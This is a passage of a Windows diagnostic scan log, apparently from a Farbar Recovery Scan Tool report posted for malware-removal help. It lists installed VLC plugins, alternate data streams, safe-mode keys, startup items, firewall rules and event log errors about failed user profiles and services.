2016-06-01 08:45 - 2016-06-01 08:45 - 00094144 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00039872 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00034240 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00027584 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00094144 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00033728 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 00033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libcaf_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 01070016 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00144320 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
2016-06-01 08:45 - 2016-06-01 08:45 - 01429952 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libfolder_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00763840 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00033728 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libpodcast_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00030656 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libmediadirs_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libwindrive_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00330688 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libjpeg_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libcdg_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00347584 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 01521088 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libschroedinger_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00844736 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libvorbis_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00339392 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libtheora_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00032704 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdts_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaraw_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00056256 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libsubstx3g_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00437696 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libflac_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00038848 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libg711_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00028096 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaes3_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00199616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspeex_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 03009472 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblibass_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00426432 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libfaad_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00031680 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liba52_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libmpeg_audio_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00035264 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblpcm_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00455616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libopus_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00135104 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdvbsub_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 00032192 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspudec_plugin.dll
2016-06-01 08:47 - 2016-06-01 08:47 - 15975872 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00916928 _____ () C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libfreetype_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00051136 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_sse2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00037824 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_mmx_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00816576 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libswscale_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00041920 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00133056 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_sse2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_mmx_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_mmx_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00046528 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i422_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00030656 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libgrey_yuv_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00059840 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i420_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00053696 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00043456 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_i420_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscale_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libyuvp_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00034240 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libscaletempo_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00148928 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libmpgatofixed32_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00196544 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libdtstofloat32_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00091584 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\liba52tofloat32_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 01515456 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsamplerate_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00036800 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsimple_channel_mixer_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00025536 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\liba52tospdif_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libdtstospdif_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00032192 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libdolby_surround_decoder_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00026048 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libugly_resampler_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00029632 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00051136 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libaudio_format_plugin.dll
2016-06-01 08:46 - 2016-06-01 08:46 - 00039872 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libcompressor_plugin.dll
2014-04-07 08:31 - 2014-04-07 08:31 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll
2016-04-25 11:39 - 2016-04-25 11:39 - 00904704 _____ () C:\Program Files (x86)\Examsoft\Softest 11.0\System.Data.SQLite.dll
2013-10-26 18:44 - 2013-08-08 14:25 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

 

[shivmister]

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\BlackChipPoker:Win32App_1
AlternateDataStreams: C:\Program Files\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files\CCleaner:Win32App_1
AlternateDataStreams: C:\Program Files\Dolby Digital Plus:Win32App_1
AlternateDataStreams: C:\Program Files\FileZilla FTP Client:Win32App_1
AlternateDataStreams: C:\Program Files\Intel:Win32App_1
AlternateDataStreams: C:\Program Files\iTunes:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Office 15:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files\WinRAR:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Apple Software Update:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\BlueStacks:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\DVD Shrink:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\LastPass:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Magical Jelly Bean:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\mIRC:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Mozilla Firefox:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\MSXML 4.0:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\QuickTime Alternative:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\TeamViewer:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VPN Unlimited:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VUDUToGo:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\XnConvert:Win32App_1
AlternateDataStreams: C:\WINDOWS\SysWOW64:Win32App_1
AlternateDataStreams: C:\ProgramData\BlueStacks:Win32App_1
AlternateDataStreams: C:\ProgramData\Intel(R) Update Manager:Win32App_1
AlternateDataStreams: C:\ProgramData\regid.1991-06.com.microsoft:Win32App_1

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iai2c.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uefi.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\uefi.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "Classic Start Menu"
HKLM\...\StartupApproved\Run: => "Yoga PhoneCompanion"
HKLM\...\StartupApproved\Run: => "Yoga Picks"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "Lenovo App Shop"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "AirDroid 3"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [WirelessDisplay-Infra-In-TCP] => (Allow) %systemroot%\system32\CastSrv.exe
FirewallRules: [UDP Query User{47BE3932-400F-49D0-983D-B4D7CED199B5}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{2AA3B6D0-E876-458B-BE9E-81C10DE06741}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{CE49CF93-0EC8-404F-9790-90157F4F923A}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [TCP Query User{B1056847-28B0-48DD-9F41-8948B38D2E44}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [UDP Query User{BB893E07-8667-4F69-BC72-936B06D0CC54}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{C5B0DE44-2C65-4567-AE9B-1C023CFDCD8D}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{C73A393A-FC2C-46DA-B962-BA7AB67F320C}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [TCP Query User{33A133CD-7086-4E7B-870A-2B14E043A99D}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [{516EB7FE-6646-4875-9FBE-33EF828D56EA}] => (Allow) C:\Program Files\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B765F9AF-C656-4870-8DBF-E1A1610395FC}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe
FirewallRules: [{AE3F85E6-7C30-4752-ABE8-1A8A54E50F1A}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismloader.exe
FirewallRules: [{7B69B2F9-AC3D-4CBD-B736-1A14454C0487}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{E68E90BB-1E71-4B56-A19F-AFF0749F5A20}] => (Allow) LPort=5556
FirewallRules: [{45BEF83D-8143-48C8-B84E-E557BC50AC22}] => (Allow) LPort=5558
FirewallRules: [{7DBD2BFE-720F-4137-BEEA-BADB6978843F}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{414A6F28-8A4C-4426-9508-C8BE1D4D185B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{5B869AB7-31F0-40C9-876C-5AF444350236}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{EA04E2D7-B327-465A-81F5-6721123D5517}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [TCP Query User{A3359ECA-A83E-41A9-9B8B-77DE98654F79}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [UDP Query User{90C32855-6548-4E45-A1AF-CC4AE6DC4286}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [{FECE8818-A771-4FDA-905C-419E61216C65}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{390B1ED0-CE02-4ED4-A6AB-4ED9187286E0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{5ADCC88B-B82B-4B81-A0A4-8DB21A184AAA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{4678A2EF-F88A-4DE7-83E2-3C868E4F1D01}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{2E06CFC3-8191-483D-9076-8C299A7D7A79}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{5E021D0C-B7B1-447D-9CDD-7FF91B92031D}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{BDFB7139-F650-459B-AB9F-BA35F0DBDE99}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [UDP Query User{AABB846D-16B2-4CB4-AE17-7707A831FC40}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [{BB3DDC02-D438-4562-BA16-342AA5CB6B5A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{49B8014D-F79F-4303-993D-4600006F699B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{66155D70-C2E6-4DEE-8D29-228F17E9836A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{65D8FD47-7254-4DB8-ACBB-9ACD1D86E8E8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{EC4EC18B-13C0-458E-BF21-053751AE1308}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1118C594-EF00-4EBE-AA6D-ECBDE8BBBCB1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7059AB57-640C-47F0-AA0A-4A015998E125}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{9D507AF1-1103-4731-92A4-0D4A4E8A2FE9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{0C757126-CD26-4759-9E0B-F8CF62A2B334}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{ABD8F192-50BE-4791-88AC-38C60F6E496D}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{4D940F22-3D13-4CEB-8209-043E6C25AF44}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{CC40EEEB-1E6C-4DB9-BB3B-0E47496D03D5}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{9FFCB36C-A2FB-44C8-BD59-729C5D8E8C87}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{679CC4F7-02A9-44CD-AC16-6858A0499AA5}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B58A077D-ACFE-4A10-AC6C-62F5B29BEA7A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{7603E194-FCBB-42BB-8112-8E5A2C8DB032}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{F192D31A-4726-452D-80E6-FC24D410BC22}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{200C029E-CFF4-4EA4-B1ED-BD183B276F39}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/03/2017 09:10:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/03/2017 08:13:55 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: Shivang)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1515) (User: Shivang)
Description: Windows has backed up this user profile. Windows will automatically try to use the backup profile the next time this user logs on.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1502) (User: Shivang)
Description: Windows cannot load the locally stored profile. Possible causes of this error include insufficient security rights or a corrupt local profile.

DETAIL - The process cannot access the file because it is being used by another process.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1508) (User: NT AUTHORITY)
Description: Windows was unable to load the registry. This problem is often caused by insufficient memory or insufficient security rights.

DETAIL - The process cannot access the file because it is being used by another process.
for C:\Users\007\ntuser.dat

Error: (03/03/2017 08:10:11 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/03/2017 08:09:42 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: Shivang)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (03/03/2017 08:09:42 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1515) (User: Shivang)
Description: Windows has backed up this user profile. Windows will automatically try to use the backup profile the next time this user logs on.

Error: (03/03/2017 08:09:42 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1502) (User: Shivang)
Description: Windows cannot load the locally stored profile. Possible causes of this error include insufficient security rights or a corrupt local profile.

DETAIL - The process cannot access the file because it is being used by another process.


System errors:
=============
Error: (03/03/2017 09:00:09 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/03/2017 08:57:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:57:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:57:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:57:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The BstHdDrv service failed to start due to the following error:
%%2

Error: (03/03/2017 08:56:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:56:21 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056

Error: (03/03/2017 08:55:52 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Office Source Engine service terminated unexpectedly. It has done this 1 time(s).

Error: (03/03/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) Dynamic Application Loader Host Interface Service service terminated unexpectedly. It has done this 1 time(s).

Error: (03/03/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) Rapid Storage Technology service terminated unexpectedly. It has done this 1 time(s).


CodeIntegrity:
===================================
Date: 2016-11-28 20:31:52.646
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-11-28 20:31:52.621
